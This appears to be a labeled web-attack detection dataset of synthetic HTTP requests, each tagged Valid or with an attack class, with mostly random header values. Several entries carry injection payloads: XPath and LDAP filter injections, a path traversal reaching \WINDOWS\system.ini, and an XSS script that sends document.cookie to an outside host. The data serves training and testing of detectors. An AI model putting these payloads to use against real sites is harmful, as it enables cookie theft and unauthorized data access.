UA-CPU: PowerPC
UA-Disp: 6300,4567,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 295x026
Via: FTP/8.6 www.aqt3n.css
Transfer-Encoding: gzip
Upgrade: Dei4/4.1
Warning: 533 www.sednnp.jpg "tceskevmhah" "Sat, 03 Dec 05 07:14:22 UTC"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 5823721853014
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16323
Start - Id: 48334
class: XPathInjection
GET /cFHlntilsfiti4eLnetV.jpeg?2Jgjib=rWu1%40rTUPt_X&q9NtelnetCpC3=oovKtph7aM&ahh=Whi HTTP/1.1
Host: www.etae.uk:80
Connection: close
Accept: video/quicktime, video/mpeg
Accept-Charset: windows-1251;q=0.4, shift_jis;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: fhehy'   or    6  < count(path/child::*)     or     'e1ts'  =    '
Cache-Control: no-store
Client-ip: 81.91.23.142
Cookie: iOdsBX=tT82QsCa;ernenuahos=5ap|tn1v
Cookie2: $Version="20"
Date: Wed, 29 Oct 08 06:20:53 GMT
ETag: W/"MzE5RqeCenXQ4Y_-"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Tue, 03 Feb 04 03:30:05 GMT
If-Unmodified-Since: Sun, 13 Feb 05 16:54:05 CET
If-Match: *
If-None-Match: "opVuVTz.OUB@D0otF"
If-Range: Tue, 20 Nov 07 05:08:30 GMT
Max-Forwards: 6
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: NTLM c2lpbmRlaGdvdXlpb29vZXBudG9vbHN3YmZubm9jZXpvaTJzYXc4aA==
Range: 8313-,-86247,250-55725
Referer: http://www.PsscnrN.com/ieng/akDdig/cyiik.asp
TE: deflate;q=0.6,chunked;q=0.0
Trailer: Warning
User-Agent: isne5r (mo3FAeWW; cjBA00E; r2FALEs5; nXIAjO; jFf1Of)
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 433x249
Via: FTP/3.7 www.eepet.html, 9.4 www.atteR.css, 1.4 131.212.10.254
Transfer-Encoding: wp4w; VrrtiY=oLhhg
Upgrade: eta/7.4, auRa/8.4
Warning: 165 www.iteoh.html "CyaaaiPnNct5o" "Mon, 03 Apr 06 22:33:02 GMT"
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 6875195
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48334
Start - Id: 18338
class: Valid
GET /deya/7R2Nn.php4? HTTP/1.0
Host: 245.12.167.16:21
Connection: close
Accept: video/*;q=0.7, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 159.233.57.166
Cookie: eh1rtt=in ;era3eAfao=w-adivesteoatO;rwobefD=aVLYqsaf-;0Ffre=meoSZW
Cookie2: $Version="7"
Date: Sat, 28 May 05 07:55:57 UTC
ETag: W/"FrEg431hhzfkL2r1zPs"
Expect: ff2t
From: Eo7Oans@nl2o.ch
If-Modified-Since: Fri, 11 Sep 09 13:05:49 CET
If-Unmodified-Since: Mon, 20 Feb 06 22:20:36 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 9.4
Pragma: mt24nP='oaAotd'
Proxy-Authorization: Digest cnonce="remesmh4"
Authorization: NTLM aG1hdXRsb25TcGFicmFpaHBoaWlRZWVycnJrZWFoY3Jlb2llb2FsZlRpZXNjZG5v
Range: 1528-
Referer: http://www.rrlbhesh.com/nbihei/meoummdo/ashp4eu/8eTpemi/yp8i.nsf
TE: chunked;q=0.5
Trailer: Date
User-Agent: ead5eir6epdrecfdecWe
UA-CPU: x86
UA-Disp: 350,951,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0744x394
Via: 8.4 67.76.201.40, 6.3 29.53.223.172
Transfer-Encoding: identity
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 242.160.205.160
X-Serial-Number: 357804395049751205
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18338
Start - Id: 38214
class: LdapInjection
GET /S9insertbg0X_Ff7Gm/s6e0aGk-aKpSmja3.HrH/ciAeenen2nr/plzhh/mmochaZK0Ka/hTgteennipa3sok1tnh/4GlPYVwgetxWg2g.css?ieoDpai2dapd=71%29%28%26%28objectClass%3DnurE%29%28%7C%28sn+++%3D+adB4%29%28cn%3Dfu+++J*%29%29&zIllL=l&7S-8p.U=g%5D%27ebeieAcai&3f9fymae3hsQ=rTgDLK0qh&Chae3aeor=0341&pt2tz3XlUt=eexterm8+&osisteedesdnmet=4568&ntuLfAz8s=eeaedmeemanna&hierc=id1fitrlasmzeeO HTTP/1.0
Host: 13.195.252.18
Connection: keep-alive
Accept: video/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="20"
Date: Tue, 10 May 05 24:11:28 GMT
ETag: W/"UStOSs522pUjsYdXz8Jw"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 03 Nov 09 16:46:02 UTC
If-Unmodified-Since: Mon, 31 Dec 07 24:31:08 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Feb 05 23:10:28 CET
Max-Forwards: 8662
MIME-Version: 3.2
Pragma: b2aobsar='in1a2'
Proxy-Authorization: 5eRiuu etshnsqi=eO4i
Authorization: NTLM ZWN5dHdvRGVyZ3djM3NvdGxpaW95aXNzZXJ0bmFvSGR5c21lZWNpZnNyZG9uZm5h
Range: 6990-,287-21192,-12716
Referer: /elZrgE/ebydt/SwHuub.txt
TE: gzip;q=0.6,chunked;q=0.7
Trailer: Warning
User-Agent: Mozilla/2.8 (Windows; U; Windows NT 1.4; e8-86; rv:6.1.3) Gecko/49294791
UA-CPU: 68000
UA-Disp: 912,7281,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 321x2267
Via: fxhc/4.2 235.190.142.45, etosgv/0.4 www.jen4hru.css, 5.1 www.oueR.css
Transfer-Encoding: identity
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38214
Start - Id: 19241
class: Valid
GET /Gdosrt48ha3ins/mP/e5j_uirUrntq2pz/.2Vpositionnodeb4Jj/l.py__2RC9JClv/iVZ/ACxtbbo7vGokL/lc7clscohuatg3/scsaacruJkgaemE.msf?sUo3zh=o0rveabtcExkenuSf&kw1jdrop=04400932&qy=ebJwtOh&mrlrzkSs=qp%3C&prlunnn=4924&oideedarmsnrr=37344328&vkfDsLfvG.=as5&nctsauat=p%28cy%5Cn&aEitbs4OecdatB=8559863&wiyteeniRsedj=e7rdduyAV0moo&OCtlhsera8=r%3Bqn28Elogsteblinkrxwdtsz&lyou7=15114 HTTP/1.1
Host: 45.129.171.48
Connection: keep-alive
Accept: text/html;q=0.1
Accept-Charset: big5, iso-8859-3, cp-936;q=0.3, x-mac-japanese;q=0.3
Accept-Encoding: 
Accept-Language: asn4aucs-horm;q=0.5, 6ee-eas4aedh;q=0.1, btpui-ooiaih
Cache-Control: no-transform
Client-ip: 127.195.164.61
Cookie: 3scriptuMsZform9Xw=6scripttdn;aegeiejrfgt=tipsdEjt5Ela;swmfEvtto=1324854352;syenlhosnh=s5noisehdO;or0tresm=eliOl:nnhrdrselect\err&c;0zoe7lvtliet=r7LwtNoFD
Cookie2: $Version="4"
Date: Thu, 04 Nov 04 06:57:40 GMT
ETag: "I75X-JoVCA4.i6ES5nZ"
Expect: 100-continue
From: 7iqaeqfi@eodpt8.it
If-Modified-Since: Thu, 16 Jul 09 11:00:56 GMT
If-Unmodified-Since: Sun, 06 Nov 05 02:00:03 CET
If-Match: *
If-None-Match: "J0dSO60o0@ZHj3HwtK68"
If-Range: "JZ4bg_c85dlV0F26cfG"
Max-Forwards: 51
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic cG5ucnlsOmV3ZXNlY2Fp
Authorization: NTLM MXFhZXNlYWllclBnYlNyMW90Qmg2ZWVib2p0MHVPcm5odw==
Range: -977
Referer: /odgsbsfm.pdf
TE: chunked,gzip;q=0.7,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 2.9; do-qo; rv:2.8.9) Gecko/44845706
UA-CPU: x86
UA-Disp: 273,4092,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7913x3682
Via: FTP/0.9 www.seriz0na.jpeg, 9.6 www.mf1tiu.tiff:29444, FTP/0.7 www.snfde.html
Transfer-Encoding: deflate
Upgrade: 9anlRu/7.8
Warning: 682 www.eteOr.htm:12055 "riL0eteotcebei" "Fri, 01 May 09 21:16:57 UTC"
X-Forwarded-For: 144.205.1.122
X-Serial-Number: 344513341459815545
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19241
Start - Id: 46629
class: XSS
GET /stalesdigereiRncppc/m6@Mk@3.cgi?ca2tet2eoEh=Tdho3oorEn&wscvt5yta=c%7E&camC=een&ccfeai2tAo6t=nzeae&ogyE5an7aamkp=phptI&u9amgfwk=2202999&f7isas=85&ld7rnehr6upiil=5308&aekcettaerdket9=tInFr2%40&Ucltlr=348814&tno7aanpvt2ui=tmpbnowlehttpsyet&whereu4oHrsPHbZj=526&doed=6846927&MsuDBaE=yino&VAqeval=lYsrsoNmleqmuttts HTTP/1.1
Host: www.Oaalekt.gov:7913
Connection: close
Accept: video/*, image/gif
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: <![CDATA[<!--]]><script>[document.location.replace ('http://www.ilstge.com/cgi-bin/etme.cgi'+document.cookie);]//--></script   >
Cache-Control: no-transform
Client-ip: 129.154.166.65
Cookie: 3wjhttpS@67=65
Cookie2: $Version="5"
Date: Thu, 15 Nov 07 12:48:02 GMT
ETag: W/"zoenLZIy2Xkfo@ynfz"
Expect: 100-continue
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Sun, 18 Sep 05 22:45:33 UTC
If-None-Match: "2rdOem7lL7YEEZ8"
If-Range: *
Max-Forwards: 0
MIME-Version: 2.9
Pragma: anR=nde2tn
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: uwsnu itseo=idiuplw
Range: 516737-,3-
Referer: http://www.xcnImc2.it/owedKie/Art72/rnel/tnuIL.php4
TE: trailers,trailers
User-Agent: 0Nnt8aonl (avZl4EubS; sBmy3zB; hCyfEbR)
UA-Pixels: 7335x113
Via: 6.5 www.efei9art.tiff
Transfer-Encoding: compress
Upgrade: Ecza/9.5
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46629
Start - Id: 37623
class: LdapInjection
PUT /espssRdetsprbDK7eo2/eya6a/nzir2hho.cfm? HTTP/1.1
Content-Length: 135
Content-Language: aH,9eomws,ottspaN
Content-Encoding: identity
Content-Location: /TxjhxnA/wmwusie/UtR5Wnu/tknee.conf
Content-MD5: ZGlkckZCajJyNzFsTnRzYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Mar 08 02:02:00 CET
Last-Modified: Mon, 16 Mar 09 10:48:23 CET
Host: 140.196.110.170
Connection: 1esescr
Accept: image/png;q=0.9, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.8
Accept-Language: tsTtnnC-ef0, eosei-3deeTmt;q=0.3, yphXesPh-s6ckswSa, iemtaeeR-rf;q=0.6, n-Nie1o;q=0.9
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: bu=eu7s  e 86pmer;Hurssas=e6.zHpqH-LXH
Cookie2: $Version="0"
Date: Wed, 26 Dec 07 11:46:11 UTC
ETag: W/"DddEOWrjiiTyulSVN@"
Expect: 100-continue
From: Isa0nt0@Tiskeey.com
If-Modified-Since: Thu, 28 May 09 02:32:06 UTC
If-Unmodified-Since: Wed, 10 Jan 07 02:06:54 UTC
If-Match: "eJrUrV.Ww.gcR2gH"
If-None-Match: *
If-Range: *
Max-Forwards: 815
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: Digest algorithm=MD5
Range: -6153,297-,439-473
Referer: /m4Etsit/zeccHr.cgi
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: ssrTeI/2.3.0.1.7
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: 3.0 www.Dos0yk.html:97, 5.6 www.iisbo.shtml:37, FTP/0.0 114.145.255.230:49
Transfer-Encoding: deflate
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 904 www.kohoocU.html "niuhm" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GW9r8y-=tzmidleaav1e&dseoue7zto3k6e=~tdI&CA7rsteKxB=) (  |(displayName=had*)    (name=had*   )(  mail=had*  )

End - Id: 37623
Start - Id: 46017
class: PathTransversal
POST /-divMnqXhgnBaMu.gif? HTTP/1.0
Content-Length: 248
Content-Language: onnoi
Content-Encoding: deflate
Content-Location: /yj4e/5a00nreo/ntOt9/ntotif.gif
Content-MD5: M2VzY210aGdhODFlZWJzYQ==
Content-Type: application/x-www-form-urlencoded
Host: 14.196.148.235
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 146.217.44.89
Cookie: e1dokQsrc5i=\WINDOWS\system.ini
Cookie2: $Version="79"
Date: Fri, 13 Aug 04 20:07:35 CET
Expect: 100-continue
If-Modified-Since: Sun, 18 Apr 10 19:14:33 UTC
If-Unmodified-Since: Sun, 08 Jul 07 20:31:09 UTC
If-Match: *
If-Range: Tue, 21 Nov 06 16:17:27 GMT
Max-Forwards: 1136
Pragma: no-cache
Proxy-Authorization: Reui iOuai=meriTAeb
Authorization: hfIvnE Lmo2eenp=ioUgiAm
Referer: http://deeash0.de/nb3e/qbhhai/TO7fzee.wmn
TE: chunked;q=0.9,trailers,trailers
Trailer: TE
User-Agent: Mozilla/5.0 (compatible; f5Tt; Open BSD i586; Lerhflz)
UA-Disp: 369,737,32
Transfer-Encoding: deflate
Upgrade: aWs/0.3, iSSmun/1.8, 5ve9e/7.2, dkn/7.0, ticd3/0.5
Warning: 274 www.f69it.png "tte3Nhrad7oh9ljEo7r" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ueglDktiadta=o39Hp&mustwAgbrhNE=utSamttdoeqcoa&oscge5=nirune39eocii&tkhiri1kalon=h7ZRhMFt&drTsxs=400726459&PIXls1= ~e&ruoQUEo-iD.=uhb&1brsa=rtetDdmlucEo&n65tteitjaJa=827&um0er=N<eed&hS=i_a7f&hSsy=328&c4agHamaG=5tntasYuNc&ede=FwgtasIeaf&ds7lt=62

End - Id: 46017
Start - Id: 31834
class: Valid
GET /bceornsiSn/eml/ED_-5Yfn/echoimsbbpojee488ep/tAi.shtml? HTTP/1.1
Host: www.prhiei.cz:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: isiri-3342;q=0.1
Accept-Encoding: 
Accept-Language: nt-lerdYssO
Cache-Control: no-cache
Client-ip: 194.99.124.169
Cookie: MNep=9973692
Cookie2: $Version="65"
Date: Sun, 05 Aug 07 10:53:10 CET
ETag: W/"gde8Dk70UHJfStlf"
Expect: emarn
From: tte0c@9tOsemgp.be
If-Modified-Since: Tue, 05 Jun 07 06:03:23 CET
If-Unmodified-Since: Wed, 09 Aug 06 04:20:04 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Dec 04 20:00:14 GMT
Max-Forwards: 82
MIME-Version: 4.6
Pragma: t=sTyarbyo
Proxy-Authorization: NTLM TzB5dXJPcklpZG5lZXR0YzJ0OXczZXNucTh0bXRhZW5Rcm5tYTJ0ZHN0eHVpaQ==
Authorization: Thtifc rinsbhra=atiD
Range: -86
Referer: http://www.pwieylm.be/ptwms7.asmx
TE: gzip;q=0.4
Trailer: If-Range
User-Agent: mu1V2Jxq http://www.nitn.net
UA-CPU: MIPS
UA-Disp: 423,7753,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2241x014
Via: HTTP/7.1 207.190.6.10
Transfer-Encoding: compress
Upgrade: qa5i/7.3, DTs/6.0, haoaax/2.5, meeac6/4.7, ic6ntw/3.1
Warning: 036 www.etnpdRo8.htm "a1euexeecqeg7ooDo" 
X-Forwarded-For: 50.243.79.16
X-Serial-Number: 69375200108238652611
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31834
Start - Id: 49750
class: XPathInjection
GET /2r.jpg?i0kepr8kn=99460299&On=%28i+++%3C+++count%28pwo%2Fchild%3A%3Atext%28%29%29++++and+j+%3C++count%28dnAq%2Fchild%3A%3Acomment%28%29%29+and++++k+%3C+++++count%28pndrnC%2Fchild%3A%3A*%29++%29&qrkikt=8215734&oadgnahs=nncfd&ehjdmmrtgic=8182441&mnmgxrfTbbfroe=5 HTTP/1.1
Host: 64.168.29.97
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: wceuo5m-S;q=0.5, nNtOckae-csa, ay-tUeg;q=0.8, jautjcz-mtiafs6d
Cache-Control: only-if-cached
Client-ip: 24.134.122.55
Cookie: bZi79qpBS=  rS2;S6ic=dS4i;sjutdwtnn8Eu= n;da=43574573;sev8lls=76
Cookie2: $Version="0"
Date: Tue, 24 Jul 07 08:04:57 CET
ETag: W/"C6vM2QmYRX16nGaa"
Expect: estrn=eis5donn;Eenme4s
From: tyese@ksT0ri.gov
If-Modified-Since: Wed, 23 Jun 04 05:30:37 CET
If-Unmodified-Since: Tue, 06 Jul 04 08:55:47 CET
If-Match: *
If-None-Match: "yRTqUh.zN_gEXj28llO5"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 8
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: NTLM b29zZWRoaWFsYXR4aGhwZGV1UkV1dGhiN2NUb3hPb25pYURkdW9vZHM=
Range: -1702
Referer: http://cbozw1.cz/t6haifd/hnUseryi/H87iheln.png
TE: trailers,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 4.1; r1-a6; rv:7.2.9) Gecko/17095650
UA-CPU: x86
UA-Disp: 317,738,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: 4.0 www.ooleolsE.jpg, 3.5 186.12.230.187:812
Transfer-Encoding: deflate
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 835 www.aifJnm.js "9hedstplseeoacoe" "Thu, 13 May 04 16:51:39 CET"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49750
Start - Id: 17297
class: Valid
GET /o9r/eesyt5llwdhra/dEhonwsa1tal0yl/lc0lnzideanao3.cgi?IG5JaE0betweenumdK=8270131848&Tcrarschr=itciavysdned%28&fW0tywtu1Uhciat=e+umtrbeval&dbieoux=e4L9fa%40W HTTP/1.1
Host: 118.59.153.56
Connection: keep-alive
Accept: video/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 8.71.56.250
Cookie: FrlZhrelerc3m=do6ludrlrw
Cookie2: $Version="526"
Date: Tue, 25 Apr 06 21:16:27 GMT
ETag: W/"tUtIzZLIRTEv2QLQH"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Sun, 11 Jan 09 17:56:52 CET
If-Unmodified-Since: Tue, 08 Apr 08 12:27:35 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 25 Mar 05 04:31:06 GMT
Max-Forwards: 060
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: eirux knieeo=9h8tlf
Range: -03,4-133137
Referer: /owytiml.jpg
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 9.9; te-n5; rv:9.2.7) Gecko/70945954
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0027x5589
Via: FTP/4.0 www.eut5T.jpeg, 4.3 www.egrac9b.js:5477, FTP/8.4 www.miai.jpg
Transfer-Encoding: tsEkuo; ehoneo=qoNrtitf
Upgrade: gnoa/0.3, nree/3.4, 2t3kns/8.8, Fnehon/4.7, kr7scp/0.5
Warning: 526 102.181.177.151 "iqxaehtm" "Wed, 11 Jun 08 17:56:22 GMT"
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17297
Start - Id: 14796
class: Valid
GET /cPHE3wbB-SWSQGTu/oiEtweErqhxiitdslEf/sLxSkXUplr.P1/rr1ofTvy.mspx?9b=D HTTP/1.0
Host: www.eemsotse.uk:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.9, deflate
Accept-Language: nnSl-Woa, uesttis-tidaa, roeWu5-T5arnst;q=0.5, ihqir-tnU;q=0.8, f95qn76s-da;q=0.8
Cache-Control: max-age=9
Client-ip: 104.98.203.85
Cookie: enaE2osNnaibr=3;roo=roC;tcdeie=TihNwyeR;lrec=6;sdu=/telnet zeexec3P 0/lrcb:osopene;caeriKtc90wyfc=ti9tminaew
Cookie2: $Version="315"
Date: Tue, 09 Dec 08 01:55:35 CET
ETag: W/"LNc6SJx9vNHFN5ry"
Expect: 100-continue
From: nOeesl@pemet.it
If-Modified-Since: Fri, 27 Feb 04 03:43:32 UTC
If-Unmodified-Since: Thu, 04 Nov 04 11:23:30 CET
If-Match: "pOU_qr-95-YlowR-ZR"
If-None-Match: "n2@qWQ_IOV7oBhRkF"
If-Range: Fri, 25 Aug 06 21:16:45 GMT
Max-Forwards: 8
MIME-Version: 6.3
Pragma: cr='eiiN'
Proxy-Authorization: NTLM dGhpb3R2bWRuZGVFczlicm50ZW5zd2VsVGxvZW9lYXVlN2Fp
Authorization: Basic bnZyc1RvOmRZMWFh
Range: -484
Referer: /HioZ.conf
TE: gzip;q=0.1,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: borst/1.2.3.4
UA-CPU: Sparc
UA-Disp: 9935,4527,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1451x6345
Via: 6.8 www.e3035.shtml, 6smsns/6.8 117.60.56.91, 3.9 www.aycc.png
Transfer-Encoding: tirnn; tiYn=N0u4wiao
Upgrade: 1s0oa/6.2, rar/3.6, oi9ah/7.0
Warning: 495 239.86.251.13 "Unj3srseiitsro" 
X-Forwarded-For: 0.184.13.124
X-Serial-Number: 48297447626041948628
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14796
Start - Id: 23260
class: Valid
GET /egGqCs2HFdm4.hk2mr9y.asp?l4r5Ra=440971181&tGeEcnij=ro&rSltati=v%25&iyuhniloel=l&ueisrs0Ao=3&hte1s8aesdO=openasiescript+ortstnch%29%2Bvn&nOoi=0332655127&fFlj1MK7Ew4=9cata&n5trgregmt=85377&etMR06ot46fod=eIozdsqjY&er=uxolsa&yEbmg=aa&yoiru=tetNlt+cf%2F HTTP/1.1
Host: 210.248.111.102
Connection: close
Accept: text/html
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: oay98aI3-osgde9eg, lxasy-tqim;q=0.1, nh-gn;q=0.3, owo-28asirET
Cache-Control: min-fresh=54
Client-ip: 127.204.168.108
Cookie: uTixwgetB-ls-G=aeoafTlA0niotsoi
Cookie2: $Version="8"
Date: Sun, 10 Aug 08 06:15:22 GMT
ETag: W/"4Vez3-g0IHgz9o4jot"
Expect: 100-continue
From: aFofh@flsmtees.ch
If-Modified-Since: Wed, 10 Nov 04 01:24:45 GMT
If-Unmodified-Since: Fri, 14 Oct 05 02:56:41 GMT
If-Match: *
If-None-Match: "DI1o0RTFOlNtiDR"
If-Range: Wed, 28 Dec 05 02:27:31 UTC
Max-Forwards: 4226
MIME-Version: 4.6
Pragma: Llk2hofa=a
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: Digest opaque="tbtauetc"
Range: 36-367,16-
Referer: http://www.yeqp.ch/tyndD.asmx
TE: trailers,deflate;q=0.6
Trailer: User-Agent
User-Agent: nsbnIei/2.7.4
UA-CPU: StrongARM
UA-Disp: 7288,4441,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 386x656
Via: FTP/3.1 79.0.179.53:854, dibush/1.8 75.158.157.16
Transfer-Encoding: identity
Upgrade: atinoz/5.3, liht/0.8, qeeon/5.8, aucer/1.3
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 85.19.231.197
X-Serial-Number: 736748310370
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23260
Start - Id: 30642
class: Valid
GET /t5X/5.Uau7e/eeks/EE/aAo3ird56eEnwtfr4kp/z5IIwhereperld5.htm? HTTP/1.1
Host: www.0I1rMf.fr:442
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 108.206.92.164
Cookie: dickhsex2epa=v.Ow;onsajr9dtebtt=776718;rp5tkenluc=sAPT;Iwkarm2=aEGk
Cookie2: $Version="188"
Date: Sat, 13 Mar 04 03:45:20 UTC
ETag: W/"74kMd3kQ_c9MCHB"
Expect: ecesa=ii2iz;5olr
From: 5mirr@nzOn.fr
If-Modified-Since: Thu, 23 Aug 07 15:36:00 CET
If-Unmodified-Since: Wed, 11 Jan 06 05:07:55 CET
If-Match: *
If-None-Match: "j3o8fjJ-LKUcQKTIU"
If-Range: Sat, 11 Nov 06 20:03:45 UTC
Max-Forwards: 70
MIME-Version: 7.9
Pragma: rlniRi=teoaS
Proxy-Authorization: Digest opaque="rkeia"
Authorization: NTLM YUxnY2dzc283amlwYXQwQVNlc25vNW9leUVuZWVkdGV1cmZucGFlYzJkMG5m
Range: 53103-346,27315-,4154-522
Referer: /nal5/seli3sdi/EXuletb.jsp
TE: deflate;q=0.6,gzip,deflate;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 8.5; lu-et; rv:5.6.1) Gecko/53195899
UA-CPU: PowerPC
UA-Disp: 388,8331,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: gzip
Upgrade: wrd/1.0, net/8.7, eao/7.0, whL8tr/7.5, Atl/5.7
Warning: 720 www.EsiaJw.png "nonetehehweionsu" 
X-Forwarded-For: 115.201.164.251
X-Serial-Number: 330746
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30642
Start - Id: 14189
class: Valid
GET /rIieienmanrYneeri/inoelrkermcnCfef6Eio/gbtkon2lmnlehtleqen6/leKnodienuic/sgca6etvewghueyUaec5/MTeiite/d.09UgZ3@YWBveINv.b/rgXqHuixXLOIi/-logperlaincludeU_bMorK.js?imciueuewnnoa=6829288274 HTTP/1.0
Host: 43.57.212.103:739
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: theai-dAueaa5e;q=0.8, cEirip-oldegnbu;q=0.2, psnrdb-rtorn
Cache-Control: no-store
Client-ip: 173.105.91.45
Cookie: t6ao=6lI0jSc
Cookie2: $Version="3"
Date: Wed, 19 Sep 07 12:40:00 UTC
ETag: W/"Cv49MOfk119Vs-r40"
Expect: 100-continue
From: wsyn@xHfoxPi.it
If-Modified-Since: Sat, 25 Apr 09 18:52:04 UTC
If-Unmodified-Since: Mon, 10 Apr 06 16:09:19 CET
If-Match: "Una-RVN@kN_66cHB"
If-None-Match: "bU7BuD6bF4PEfXZLF"
If-Range: *
Max-Forwards: 4091
MIME-Version: 8.0
Pragma: 8=Atiae
Proxy-Authorization: eets 3cgniiel=mreanh
